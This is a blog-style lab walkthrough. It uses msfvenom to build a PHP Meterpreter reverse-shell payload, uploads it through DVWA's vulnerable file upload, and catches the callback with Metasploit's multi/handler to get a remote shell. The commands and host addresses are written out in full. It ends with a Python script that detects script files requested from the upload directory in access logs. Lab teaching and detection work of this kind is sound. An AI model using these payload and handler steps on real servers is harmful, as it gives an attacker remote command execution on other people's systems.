Exploiting a Web Server - Using msfvenom generated PHP Web Payload


This exploit uses some of the file upload functions of the DVWA web site to demonstrate how to hack through the site itself. A hacker would use this type of vulnerability to gain access to web applications, servers, and data.

We will start by preparing PHP code that we will upload to the web server through the upload functionality provided by DVWA.

For this exercise, I hosted the DVWA application in XAMPP on my host operating system. I will generate the PHP code using msfvenom on Kali Linux, which runs in Oracle VirtualBox.

On Kali Linux, run the following command to generate the PHP web payload:

$ msfvenom -p php/meterpreter/reverse_tcp LHOST=<Local IP>  LPORT=<Local Port>  -f raw > phpshell.php

For example,

$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 -f raw > phpshell.php

Here, 192.168.0.2 is the IP address of the Kali machine.



It will generate the following PHP code:



Open a Web Browser (in Kali) and go to http://localhost/DVWA-master/login.php

Log in with admin as the username and password as the password.




Choose the Upload menu on the lower left


Click Choose File and select the phpshell.php file we just created on the Desktop and click Upload



The file is then posted to the server and the location is displayed for you as a means of confirmation. You can copy this and paste it at the end of the URL in the browser.

In the browser, visit that file’s location:

http://192.168.0.1/DVWA-master/hackable/uploads/phpshell.php

This will actually fail and you should see a “no socket” message, but we’ll set that up next.

Back in the Kali SSH session, we will set up the listener that the web server will connect back to.

If you’re not within msfconsole anymore, start it: 

$ msfconsole


Now we want to choose an exploit to run.

msf> use exploit/multi/handler



msf> (exploit/multi/handler): 

This selects the exploit we’ll run in Metasploit. Next, set the payload to the same one we used with msfvenom:

msf > set payload php/meterpreter/reverse_tcp

To see the options for this payload, type:

msf > show options 




Set the options as follows:

msf > set LHOST 192.168.0.2
msf > set LPORT 4444

These options are the ‘local’ listening IP and port for the exploit. 

Return to your web browser on the Windows PC and refresh the page.

Now we can start the server:

msf > exploit

Exploit is the fun command… here we are running the exploit we want to see. You can also use run but exploit is so much more Hacker. After a few seconds, you should see:


And then a moment or two later we get a Meterpreter shell:

meterpreter >

Let’s examine the web server to see what we can find. In the Meterpreter shell type:

meterpreter > dir



You can run any command of the targeted OS from the Meterpreter shell.

To see a list of the commands that are available to you, type help at any time. When you’re finished, type exit and the Meterpreter shell will close.
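From the defender's side, the request to the uploaded file shown earlier (/DVWA-master/hackable/uploads/phpshell.php) is the event to look for in the web server's access log. The following Python script is an added example, not part of the original post; the log lines are constructed, and the Apache log format, the extension list and the upload form path in the sample are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Assumption: uploads are served from this URL prefix (from the URL in the post).
UPLOAD_PREFIX = "/dvwa-master/hackable/uploads/"
# Assumption: extensions the server hands to PHP; adjust to the real handler config.
SCRIPT_EXTS = {".php", ".phtml", ".phar", ".php5", ".php7"}

# Apache common/combined log format: host, timestamp, request line, status.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)

def find_upload_execution(lines):
    """Return requests that fetched a script file from the upload directory."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        # Drop the query string, decode %xx escapes, collapse ../ and //.
        path = posixpath.normpath(unquote(urlsplit(m["target"]).path)).lower()
        if not path.startswith(UPLOAD_PREFIX):
            continue
        if posixpath.splitext(path)[1] in SCRIPT_EXTS:
            hits.append({"ip": m["ip"], "time": m["ts"], "method": m["method"],
                         "path": path, "status": int(m["status"])})
    return hits

# Constructed sample log lines (not captured from a real server).
SAMPLE_LOG = [
    '192.168.0.2 - - [01/Jan/2024:10:00:01 +0000] "POST /DVWA-master/vulnerabilities/upload/ HTTP/1.1" 200 4321',
    '192.168.0.2 - - [01/Jan/2024:10:00:09 +0000] "GET /DVWA-master/hackable/uploads/phpshell.php HTTP/1.1" 200 0',
    '192.168.0.7 - - [01/Jan/2024:10:02:30 +0000] "GET /DVWA-master/hackable/uploads/photo.jpg HTTP/1.1" 200 51234',
    '192.168.0.2 - - [01/Jan/2024:10:03:12 +0000] "GET /DVWA-master/hackable/uploads/phpshell.PHP?x=1 HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for hit in find_upload_execution(SAMPLE_LOG):
        print("{time} {ip} {method} {path} -> {status}".format(**hit))
```

Any hit is worth investigating, because files in an upload directory should never be run by the PHP interpreter.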
